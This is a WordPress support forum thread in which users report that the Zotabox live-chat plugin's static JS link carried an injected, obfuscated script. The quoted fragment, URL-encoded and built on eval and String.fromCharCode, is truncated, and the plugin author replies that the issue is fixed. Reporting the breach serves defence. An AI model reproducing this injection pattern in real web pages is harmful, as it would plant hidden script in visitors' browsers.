Title: Security Breach – Hack Last modified: May 19, 2019 --- # Security Breach – Hack * Resolved [lukeflego](https://wordpress.org/support/users/lukeflego/) * (@lukeflego) * [7 years ago](https://wordpress.org/support/topic/security-breach-hack/) * Found a breach in the JS link – injection * Using URL encoded JS (script tag, eval, String.fromCharCode) in the zotabox staticlink… * [https://static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,…](https://static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,…);[ script removed for safety] …,%20125));%3C/script%3E/widgets.js Viewing 4 replies - 1 through 4 (of 4 total) * Plugin Author [Zotabox](https://wordpress.org/support/users/zotabox/) * (@zotabox) * [7 years ago](https://wordpress.org/support/topic/security-breach-hack/#post-11547814) * Hi, we have fixed this issue. Please de-activate and activate your plugin again to update to our latest version. * Sorry for the inconvenience. * [LogixTree](https://wordpress.org/support/users/logixtree/) * (@logixtree) * [7 years ago](https://wordpress.org/support/topic/security-breach-hack/#post-11548192) * In the Earlier version, ESET was reporting the link and blocked it further. After updating the plugin, So far no report. But I can still see the eval() code is being used. Are you sure it’s okay to continue the use? * Anonymous User 11986954 * (@anonymized-11986954) * [7 years ago](https://wordpress.org/support/topic/security-breach-hack/#post-11550710) * Deactivating and reactivating after update seems to work, very odd, it shouldn’t be necessary. - This reply was modified 7 years ago by Anonymous User 11986954. * Plugin Author [Zotabox](https://wordpress.org/support/users/zotabox/) * (@zotabox) * [7 years ago](https://wordpress.org/support/topic/security-breach-hack/#post-11550767) * Yes, after updating our plugin, de-activating and activating again will remove unexpected script from your site. * Please refresh your website cache after the above steps. * Sorry for the inconvenience. Viewing 4 replies - 1 through 4 (of 4 total) The topic ‘Security Breach – Hack’ is closed to new replies. * ![](https://ps.w.org/fb-messenger-live-chat/assets/icon-256x256.png?rev=1947145) * [Live Chat with Messenger Customer Chat](https://wordpress.org/plugins/fb-messenger-live-chat/) * [Frequently Asked Questions](https://wordpress.org/plugins/fb-messenger-live-chat/#faq) * [Support Threads](https://wordpress.org/support/plugin/fb-messenger-live-chat/) * [Active Topics](https://wordpress.org/support/plugin/fb-messenger-live-chat/active/) * [Unresolved Topics](https://wordpress.org/support/plugin/fb-messenger-live-chat/unresolved/) * [Reviews](https://wordpress.org/support/plugin/fb-messenger-live-chat/reviews/) * 4 replies * 0 participants * Last reply from: [Zotabox](https://wordpress.org/support/users/zotabox/) * Last activity: [7 years ago](https://wordpress.org/support/topic/security-breach-hack/#post-11550767) * Status: resolved